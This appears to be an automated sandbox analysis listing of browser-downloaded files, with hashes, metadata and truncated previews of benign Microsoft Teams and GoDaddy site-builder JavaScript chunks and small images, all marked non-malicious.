                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/972276-16a6accc1de1eb6a.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[972276],{296920:(e,t,n)=>{n.d(t,{e:()=>y,y:()=>I});var i=n(689054),r=n(305573);function s(e,t){for(var n,i=/\r\n|[\n\r]/g,r=1,s=t+1;(n=i.exec(e.body))&&n.index<t;)r+=1,s=t+1-(n.index+n[0].length);return{line:r,column:s}}function a(e){return o(e.source,s(e.source,e.start))}function o(e,t){var n=e.locationOffset.column-1,i=u(n)+e.body,r=t.line-1,s=e.locationOffset.line-1,a=t.line+s,o=1===t.line?n:0,l=t.column+o,p="".concat(e.name,":").concat(a,":").concat(l,"\n"),h=i.split(/\r\n|[\n\r]/g),f=h[r];if(f.length>120){for(var d=Math.floor(l/80),E=l%80,v=[],N=0;N<f.length;N+=80)v.push(f.slice(N,N+80));return p+c([["".concat(a),v[0]]].concat(v.slice(1,d+1).map((function(e){return["",e]})),[[" ",u(E-1)+"^"],["",v[d+1]]]))}return p+c([["".concat(a-1),h[r-1]],["".concat(a),f],["",u(l-1)+"^"],["".concat(a+1),h[r+1]]])}function c(e){var t=e.filter((function(e){e[0];return void 0!==e[1]})),n
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (522)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):586
                                                                                                                                                                                                                          Entropy (8bit):5.2378887904744955
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:12:H/QL7ANBSyTUXaPXAbDTc/NeL2QiTj+RVngQ2ofXgYhMYTHr+pWgL7AO:cANBLTUXaPXAPTc/tTj+HngQ2CQY/HrQ
                                                                                                                                                                                                                          MD5:FADB3719FFA2A9E96CDC64FFEA0220FA
                                                                                                                                                                                                                          SHA1:B9B00833E59E99ECE036B518D8429AF5EFEC1163
                                                                                                                                                                                                                          SHA-256:E8A5463FF98210D3017DEEE55D5A287AD01AAA11DBE7DEB7D07F7D15D7F609F2
                                                                                                                                                                                                                          SHA-512:C6E3581F7676B3204BC0FC8D4DCCF5A383FDE6F17A27D2F855EBEE3D205459BD9866A219808EAB1D4D4B37676D13B516AF546C7125C3FFA22CA74B995A180644
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://img1.wsimg.com/blobby/go/static/radpack/@wsb/guac-widget-shared/c/_rollupPluginBabelHelpers-8ce54c82.js
                                                                                                                                                                                                                          Preview:define("@wsb/guac-widget-shared/c/_rollupPluginBabelHelpers-8ce54c82.js",["exports"],(function(e){"use strict";function n(){return n=Object.assign?Object.assign.bind():function(e){for(var n=1;n<arguments.length;n++){var r=arguments[n];for(var t in r)Object.prototype.hasOwnProperty.call(r,t)&&(e[t]=r[t])}return e},n.apply(this,arguments)}e._=n,e.a=function(e,n,r){return n in e?Object.defineProperty(e,n,{value:r,enumerable:!0,configurable:!0,writable:!0}):e[n]=r,e}})),"undefined"!=typeof window&&(window.global=window);.//# sourceMappingURL=_rollupPluginBabelHelpers-8ce54c82.js.map.
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):72397
                                                                                                                                                                                                                          Entropy (8bit):5.573376353724739
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:1OXc691wWyysPfUhbGQ1D+p+WX45ikOJoSSFRVZ9IfdT8dSRV4CXM9xt/krh+Dn9:QHk8MQ1eQV3xZBknYVQ7kjxLV
                                                                                                                                                                                                                          MD5:AAF166634E0AF9C57B73959561975D31
                                                                                                                                                                                                                          SHA1:308666AF0F6C45368251D07BB51845D493399905
                                                                                                                                                                                                                          SHA-256:7143F3DCCFAEDF4793A9CFED07CD262C9F3224CCF0109E9549BBE7E40618A773
                                                                                                                                                                                                                          SHA-512:AB77EB4CD34493AA0C1FF623124E596388C0F56307EAAF9D85AC205145ECC494D223975C5EFFF61E083FC07CA6969CC48E40CDF2B6E6F6BA4C5EE302C36E49AE
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[509664],{641939:(e,t,a)=>{a.d(t,{W:()=>r});var r=function(e){return{attributes:{root:{"aria-hidden":e.alt||e["aria-label"]?void 0:"true"}}}}},478176:(e,t,a)=>{a.d(t,{w:()=>n});var r=a(888846),n=function(e){return{attributes:{root:{role:"menu"}},focusZone:{props:{shouldFocusInnerElementWhenReceivedFocus:!0,direction:r.E.bidirectionalDomOrder}}}}},792747:(e,t,a)=>{a.d(t,{j:()=>s});var r=a(953543),n=a(504405),s=function(e){var t;return{attributes:{root:(t={role:"menuitem"},t[n.P]=!0,t)},keyActions:{root:{performClick:{keyCombinations:[{keyCode:r.rC.Enter},{keyCode:r.ZG}]}}}}}},306749:(e,t,a)=>{a.d(t,{z:()=>r});var r=function(){return{attributes:{root:{role:"img"}}}}},537602:(e,t,a)=>{a.d(t,{q:()=>l});var r=a(716300),n=a(513432),s=a(253070);const l=e=>{const t=n.createContext({value:{current:e},version:{current:-1},listeners:[]});var a;return t.Provider=(a=t.Provider,e=>{const t=
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (14597)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):14704
                                                                                                                                                                                                                          Entropy (8bit):5.338644980766392
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:yDy9KXN9PXncytlT76Hqhv2owjeGFbkRSiYHGqHrPM:yDy9KXN9PXBTeKheowjeGNkRB8HrPM
                                                                                                                                                                                                                          MD5:E257289635424ACB7266CD30D7E54437
                                                                                                                                                                                                                          SHA1:4630D5A9FE4284F06512492D5BFB68BB1D4AFB06
                                                                                                                                                                                                                          SHA-256:771A868DE1B710DC07E726E78E91A8E20F48C49623A0E3057DD8E98F4450887D
                                                                                                                                                                                                                          SHA-512:87D85C1F473931A7CABA721CDF6C9DC2F6728306BD4A42FB22BC0F785D801377EE9E4027B9CE039296F4C9C8B407BC619B0023C2941A956113690650DB50B72A
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[78219],{78219:(e,t,r)=>{r.d(t,{aQ:()=>b,yc:()=>f,Hm:()=>E,nF:()=>M,n:()=>A,OP:()=>I,Dk:()=>S,vh:()=>D,Y3:()=>v,qO:()=>x,Gd:()=>U,fw:()=>q,sE:()=>O,SQ:()=>N,wh:()=>$,ih:()=>X,EV:()=>F,dw:()=>B,fo:()=>P,aC:()=>H,g8:()=>z,H4:()=>W,ZH:()=>K,F9:()=>J,Xz:()=>Q,$6:()=>Z,cO:()=>Y,SS:()=>j});var o=r(847431),a=r(625292),n=r(848020),c=r(802756),i=r(955262),s=r(923226),d=r(417694),u=r(406138),l=r(703478),p=r(935008),h=r(161024),y=r(366603),g=r(211713),C=r(775251),m=r(299096),k=r(920506);const b=(e,t)=>{const{id:r,type:o,role:a,profile:n,subType:c,cloud:i,homeAccountId:s}=e,l=_(e),h=i!==l.cloud,y=d.Vh.getValue((0,u.Xr)((0,p.X_)(e)).telemetryInfo);t.setUserToTelemetryContext({id:r,type:o,role:a,oid:n?.oid,tid:n?.tid,subType:c,isCrossCloudUser:!!y?.isCrossCloudUser,isExternal:(0,p.ge)(r,s),userCloud:l.cloud,homeAccountId:h?l.cloud:l?.id,homeTenantId:h?l.cloud:l?.profile.tid})},_=e=>{if(!e.h
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (5570)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):5678
                                                                                                                                                                                                                          Entropy (8bit):5.412429152356154
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:96:N2y+zXTgXS4IvFM3pwRY4XCcO+Luj20gwceo1zf/ArJPawBXj/kb+DE:NgEi4ItM3pmEcOQuzx4f/AVXYKDE
                                                                                                                                                                                                                          MD5:29ACBE811F209B39A435C7D0FF3CC186
                                                                                                                                                                                                                          SHA1:541A19A018AA0D425A4958054BD5EC6B66749E60
                                                                                                                                                                                                                          SHA-256:BB44554D718C31BA72F43929903CE73E8093406C59658C00EFE2F80F70D498E0
                                                                                                                                                                                                                          SHA-512:E13F6E954CF561E68E4F3D89D1AD662CBD1D406AFA4D216A118109FD5403BB98D1C7D712E10FD8D366A122719F62F7DDCA722C71120EB3A1018C60F87713CFAC
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[816373],{752705:function(t,n,e){!function(r,i){{const r=(o=o||function(t,n){var r;if("undefined"!=typeof window&&window.crypto&&(r=window.crypto),"undefined"!=typeof self&&self.crypto&&(r=self.crypto),"undefined"!=typeof globalThis&&globalThis.crypto&&(r=globalThis.crypto),!r&&"undefined"!=typeof window&&window.msCrypto&&(r=window.msCrypto),!r&&void 0!==e.g&&e.g.crypto&&(r=e.g.crypto),!r)try{r=e(475443)}catch(t){}var i=function(){if(r){if("function"==typeof r.getRandomValues)try{return r.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof r.randomBytes)try{return r.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")},o=Object.create||function(){function t(){}return function(n){var e;return t.prototype=n,e=new t,t.prototype=null,e}}(),s={},a=s.lib={},c=a.Base={extend:function(t){var n=o(this);retu
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (22028)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):22136
                                                                                                                                                                                                                          Entropy (8bit):5.408588929590394
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:B3NqcNsJobwv8blMDkuYMBYcTjlXH8P2WOhCOdf1D71yF7Ju0bTul3cE+w4Ry7Eq:VE4VUv8RMD9YMBYcnlXH8P2WOhCOdf1P
                                                                                                                                                                                                                          MD5:A87E1F75E1BF072B58ED22C7F8DB87A7
                                                                                                                                                                                                                          SHA1:C4FDB0BA7198411E7510008AD2E812F3BB68D462
                                                                                                                                                                                                                          SHA-256:1DC0883980E666CFDB588463571ECC238B750ADD14372B967A18E2C427DAB9F1
                                                                                                                                                                                                                          SHA-512:64CD0292C77ADBDF95568D680F0DCC9B429A30553F6678ACD487D09C63C8E609FE3A043FFDFADD77BD41382D474B3186A57B2009919F7F6A3F1702805A2F4622
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/816410-26421d0c40cd02ca.js
                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[816410],{816410:function(e){e.exports=function(){"use strict";const{entries:e,setPrototypeOf:t,isFrozen:n,getPrototypeOf:o,getOwnPropertyDescriptor:r}=Object;let{freeze:i,seal:a,create:l}=Object,{apply:c,construct:s}="undefined"!=typeof Reflect&&Reflect;i||(i=function(e){return e}),a||(a=function(e){return e}),c||(c=function(e,t,n){return e.apply(t,n)}),s||(s=function(e,t){return new e(...t)});const u=b(Array.prototype.forEach),m=b(Array.prototype.pop),p=b(Array.prototype.push),f=b(String.prototype.toLowerCase),d=b(String.prototype.toString),h=b(String.prototype.match),g=b(String.prototype.replace),_=b(String.prototype.indexOf),T=b(String.prototype.trim),y=b(Object.prototype.hasOwnProperty),E=b(RegExp.prototype.test),A=S(TypeError);function N(e){return"number"==typeof e&&isNaN(e)}function b(e){return function(t){for(var n=arguments.length,o=new Array(n>1?n-1:0),r=1;r<n;r++)o[r-1]=argument
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (16052)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):16159
                                                                                                                                                                                                                          Entropy (8bit):5.403213464045788
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:qF/Vze9fyDd5XbL02+tzovnkPky/tdhXisJF0zFlCvmdDQnmumjftj76tA4EN9:kdzjd5rL02gzovnGtldIsJF0pQvmd8mT
                                                                                                                                                                                                                          MD5:4081724B2479E5E968A58A0682ECE8EB
                                                                                                                                                                                                                          SHA1:449F3DC38DA9CB1826064CC92CCA171D05D4527B
                                                                                                                                                                                                                          SHA-256:4EF6E1959E07EF11CA16E74EDD46384665C5AFFA72A8D8F2BDFDC1F19FB0566F
                                                                                                                                                                                                                          SHA-512:7942E3A9D9D45F6C6268040756632D9EA6D6C172245CF8170591E37B465C8F85927795BB5223806B319B575F78F4C294DEBBCC533B5EE37B6ABF75BADA163239
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/61875-11d8be0fadbe338b.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[61875],{437932:(e,t,n)=>{n.d(t,{T:()=>$});var o=n(598166),r=n(35871),i=n(70410),a=n(602835),l=n(716300),s=n(513432);function c(e,t,n){const o=s.useRef(!0),[r]=s.useState((()=>({value:e,callback:t,facade:{get current(){return r.value},set current(e){const t=r.value;if(t!==e){if(r.value=e,n&&o.current)return;r.callback(e,t)}}}})));return(0,l.E)((()=>{o.current=!1}),[]),r.callback=t,r.facade}const u=e=>{switch(e){case"always":case!0:return{applyMaxWidth:!0,applyMaxHeight:!0};case"width-always":case"width":return{applyMaxWidth:!0,applyMaxHeight:!1};case"height-always":case"height":return{applyMaxWidth:!1,applyMaxHeight:!0};default:return!1}},d=e=>{const t=e&&(e=>"HTML"===e.nodeName?e:e.parentNode||e.host)(e);if(!t)return document.body;switch(t.nodeName){case"HTML":case"BODY":return t.ownerDocument.body;case"#document":return t.body}const{overflow:n,overflowX:o,overflowY:r}=(e=>{v
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (905)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):960
                                                                                                                                                                                                                          Entropy (8bit):5.203352394673048
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:pzBLgJHHVvC+dKbywqIN6ttVFRJB1i/uwBrV7DtZHrIvyU:zSkjbQxz3+uQ7RxrIx
                                                                                                                                                                                                                          MD5:62A914B2C847D4D02B76164D7A2A54C6
                                                                                                                                                                                                                          SHA1:20D9F49A90A51FA6C8420640610DF77F7A96D919
                                                                                                                                                                                                                          SHA-256:B08C2864EC27736C507B1CA4B3A225A19147841B861CD8494DAF95FA370FE639
                                                                                                                                                                                                                          SHA-512:E67D3D9F68EF3151D93DEDAA3530DF89F0C957F08561E93134B219DEC23C2A1FE0D109AC666619526742C5411E4636ECE416A3AD1148C1AD0861F0050B41D3DE
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:define("@wsb/guac-widget-shared/c/_commonjsHelpers-67085353.js",["exports"],(function(e){"use strict";var n="undefined"!=typeof globalThis?globalThis:"undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};e.a=n,e.b=function(e){if(e.__esModule)return e;var n=Object.defineProperty({},"__esModule",{value:!0});return Object.keys(e).forEach((function(t){var r=Object.getOwnPropertyDescriptor(e,t);Object.defineProperty(n,t,r.get?r:{enumerable:!0,get:function(){return e[t]}})})),n},e.c=function(e,n,t){return e(t={path:n,exports:{},require:function(e,n){return function(){throw new Error("Dynamic requires are not currently supported by @rollup/plugin-commonjs")}(null==n&&t.path)}},t.exports),t.exports},e.g=function(e){return e&&e.__esModule&&Object.prototype.hasOwnProperty.call(e,"default")?e.default:e}})),"undefined"!=typeof window&&(window.global=window);.//# sourceMappingURL=_commonjsHelpers-67085353.js.map.
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):376
                                                                                                                                                                                                                          Entropy (8bit):5.26382172599974
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:6:DZ5zXcglsP0gelIil/kZD6LcjWkL4gE6z5m9RdoAilYEPltls+4JeSEHj+iq0q50:vjVlhblMZD6Lsj0cm9UpjPb3SkEl9uu
                                                                                                                                                                                                                          MD5:B3B9C18E23A4C2A14F59B8E8EF3F4204
                                                                                                                                                                                                                          SHA1:0BC399963E67A694643CA2F5E392C0DB47F9022A
                                                                                                                                                                                                                          SHA-256:EABE7F49F47797C6F135C79E0F4F041AE00E60549B9DF388801FFAECAD8836C4
                                                                                                                                                                                                                          SHA-512:5209D395C0EC86ADAC454BA247740E0AE93588927DD03146292597BF4DA0EBD63DE86EB4B7D537EF47855F74F553057331977A8D421C2412A4253935077813C4
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:"https://img1.wsimg.com/isteam/ip/f987ee28-0d2d-4d49-bb11-834c1995f8b3/favicon/909c1b4d-c97b-4914-b7e0-f39ba802c054/b773b1db-e964-4dd6-8fed-45fbfd73ffc5.png/:/rs=w:16,h:16,m"
                                                                                                                                                                                                                          Preview:RIFFp...WEBPVP8X..............VP8 ....p....*....>m*.E."....@...N.B$..&.2U@..b.. ..WW..pZ0...]....|........Yi-..Y....TM...T.N...7.H..?..|i.{..K.7....s...Hh..!........8X....s.=H...EXIF....Exif..II*...........................V...........^...(.......................i.......f.......8c......8c................0210....................0100........................................
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (60240)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):60348
                                                                                                                                                                                                                          Entropy (8bit):4.483293718479703
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:1536:YdXLNVjPjYgCvyPJy+EPXt42hABXwhJKK:uNV7jYpyPJy+EPXt42hABUJKK
                                                                                                                                                                                                                          MD5:B445DBDD2330900E22E737DE4C72215D
                                                                                                                                                                                                                          SHA1:53F4297A5CAE9D4B7C576DBEE5A413AE85F39A8C
                                                                                                                                                                                                                          SHA-256:33A7F949CBB18F9B050399510CC0F9D0DD3855311ABE2D662C13B59C5C82680B
                                                                                                                                                                                                                          SHA-512:BD46D44EC8E7127E019DE6FF15E88562E2DA9730203229AA0D2C48F13B1380A4D84F391F0D8FC12D9C821A691612E2C5AB68898861C449CD21F7CB1F629BF0CF
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/750818-47183b62e0fe13ec.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[750818],{750818:(a,l,Z)=>{Z.d(l,{_jO:()=>e,iNx:()=>m,gcm:()=>h,_Xk:()=>v,IjV:()=>M,Ylq:()=>H,W_M:()=>r,yuG:()=>i,NGN:()=>V,nUb:()=>o,oAB:()=>U,Crl:()=>A,tyz:()=>C,LKJ:()=>t,xeZ:()=>L,dbj:()=>d,Cke:()=>u,aUo:()=>n,dgX:()=>s,lr5:()=>g,k$2:()=>R,m_5:()=>F,BKw:()=>D,Njq:()=>p,QWN:()=>k,CX7:()=>f,V6R:()=>w,Xwn:()=>E,nvQ:()=>y,XUe:()=>S,c4C:()=>O,yly:()=>b,_B:()=>j,wSM:()=>_,onv:()=>B,iG:()=>x,nrH:()=>P,J3O:()=>T,qQV:()=>W,ALn:()=>Q,$HY:()=>q,ZJc:()=>N,MVw:()=>z,akU:()=>X,WhM:()=>G,CbY:()=>$,WHO:()=>I,k_r:()=>J,POZ:()=>K,Lpw:()=>Y,OGg:()=>aa,O6n:()=>la,pQD:()=>Za,jsk:()=>ca,FT3:()=>ea,Htf:()=>ma,xhg:()=>ha,d_C:()=>va,f8w:()=>Ma,pwR:()=>Ha,sVb:()=>ra,iil:()=>ia,Enj:()=>Va,Qvr:()=>oa,zBW:()=>Ua,LWr:()=>Aa,d0y:()=>Ca,cBQ:()=>ta,Ult:()=>La,pyq:()=>da,smH:()=>ua,Gdy:()=>na,f0V:()=>sa,VEF:()=>ga,yus:()=>Ra,IN0:()=>Fa,olq:()=>Da,W6w:()=>pa,Sz$:()=>ka,y7H:()=>fa,p$u:()=>wa,ntX:()=>Ea,DxS:(
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):324
                                                                                                                                                                                                                          Entropy (8bit):5.376083689062415
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:6:FSPl39b4BSyRbjGJlI9kXJ3+V0q1EkmGHr9EJiKWaEt39J:cd39MBSyVz0XkTHr+pWTt39J
                                                                                                                                                                                                                          MD5:ACD4F2B6117E5054FC9BF848AE8121CA
                                                                                                                                                                                                                          SHA1:AE4D5F41D854BA8D99A4A1EC6EE6D6C3C0A859B8
                                                                                                                                                                                                                          SHA-256:66774F89FCFA5674BE9AEF60E3FE3CB81E4DD88246BDE4E5392DF8B99FEFD4DB
                                                                                                                                                                                                                          SHA-512:906FC9144D4AB81E8000CBE4A7AF7AFF775464347449193337E8738D705888C02B9476E083B3B67BDB3CBC312AAC4644C10737BC1FC5F9F08B38F5F45A2410F9
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://img1.wsimg.com/blobby/go/static/radpack/@widget/LAYOUT/c/bs-legacyOverrides-42582241.js
                                                                                                                                                                                                                          Preview:define("@widget/LAYOUT/c/bs-legacyOverrides-42582241.js",["exports"],(function(e){"use strict";e.g=function(e,i,n){let o={};return"MENU"===i&&"h3"===e&&(o={color:"highlight"},"menu3"===n&&(o.fontSize="large")),o}})),"undefined"!=typeof window&&(window.global=window);.//# sourceMappingURL=bs-legacyOverrides-42582241.js.map.
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:PNG image data, 51 x 98, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):61
                                                                                                                                                                                                                          Entropy (8bit):4.068159130770306
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3:yionv//thPle/N0Z+l8kxl/k4E08up:6v/lhPTZdk7Tp
                                                                                                                                                                                                                          MD5:CF085B9838692D102F64648C42A49FFB
                                                                                                                                                                                                                          SHA1:11907F90EEA144ECDC692739630828DF96998319
                                                                                                                                                                                                                          SHA-256:55A0DF29102247095C7B2B5936AD084EB334189A21D3ED822F4092109846A1EB
                                                                                                                                                                                                                          SHA-512:C89BEDDA5C744CB806AB9110597257C314A60D8312C8F0C1B6A2DF94FFADB0ACC2976EB41704FEAD3533CD3E8E9D0A97CB44D203F4EC8029CDCAC8883A7E22E0
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8f38965da8164322/1734456067754/uaxTCBfY0EP6nEY
                                                                                                                                                                                                                          Preview:.PNG........IHDR...3...b.....r.|/....IDAT.....$.....IEND.B`.
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (3666)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):3774
                                                                                                                                                                                                                          Entropy (8bit):5.548756589394929
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:96:HGRm7M6x8TOsdyjLi+i2+iX334q269Q3WOpTiW03f:HGRm7M6mTOLi3WNQ3VixP
                                                                                                                                                                                                                          MD5:67B134A86A1BED63678A879F6C3B59A0
                                                                                                                                                                                                                          SHA1:6B8D7926C3D55680EAE35CA01B79852F46378890
                                                                                                                                                                                                                          SHA-256:FF6874070AE590ED1317FE686388DD599E44B646715E3B6A9621C388490C28A5
                                                                                                                                                                                                                          SHA-512:82FAB2F7E52337E653466F1BF3DC1D5A9A802AAE9CA83D21224F9F01A8BA11441262CE413A86FCD946EBC0D68F8405AB0947FB778EB42269D5FE67057125CC77
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/699899-331504c4218b8be3.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[699899],{699899:(e,t,n)=>{n.d(t,{BM:()=>N,Ps:()=>T,kJ:()=>I});var r=n(189687),i=n(425104);n(296920),n(132786);const a=e=>e%4==0&&e%100!=0||e%400==0,s=e=>/^([01][0-9]|2[0-3]):([0-5][0-9]):([0-5][0-9])(\.\d{1,})?(([Z])|([+|-]([01][0-9]|2[0-3]):[0-5][0-9]))$/.test(e),o=e=>{if(!/^(\d{4}-(0[1-9]|1[012])-(0[1-9]|[12][0-9]|3[01]))$/.test(e))return!1;const t=Number(e.substr(0,4)),n=Number(e.substr(5,2)),r=Number(e.substr(8,2));switch(n){case 2:return!(a(t)&&r>29)&&!(!a(t)&&r>28);case 4:case 6:case 9:case 11:if(r>30)return!1}return!0},c=e=>{if(!/^(\d{4}-(0[1-9]|1[012])-(0[1-9]|[12][0-9]|3[01])T([01][0-9]|2[0-3]):([0-5][0-9]):([0-5][0-9]|60))(\.\d{1,})?(([Z])|([+|-]([01][0-9]|2[0-3]):[0-5][0-9]))$/.test(e))return!1;const t=Date.parse(e);if(t!=t)return!1;const n=e.indexOf("T"),r=e.substr(0,n),i=e.substr(n+1);return o(r)&&s(i)},u=e=>{const t=e.getTime();return t==t},p=e=>new Date(e),l={n
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (2415)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):2523
                                                                                                                                                                                                                          Entropy (8bit):4.936941985388673
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:48:wp3sp3D3Z90ikSrl6iyfVCbbdm0i8CjQ6W60bvxamg:+ibrl5ytedg8KE60G
                                                                                                                                                                                                                          MD5:A46DE267E5DDDBCFEDEB8F09EBCA224E
                                                                                                                                                                                                                          SHA1:7CB86C8DBD48BCB3EADF6345571638F603AA83F0
                                                                                                                                                                                                                          SHA-256:4FA2C10DC524A8BE22772F88CF2A4A6E1C9F4E88F67AFF5E2AB220167B842CE7
                                                                                                                                                                                                                          SHA-512:488727A3601F6AA285AD548E411D315F957CFBBC671A4C7F179FB0DE57B0DBC65E0AC91BCBBE55DBFBFAD8C2672202A6F2A5734AA841E9B7BACE671DBB31FF14
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/273198-072882987da06b97.js
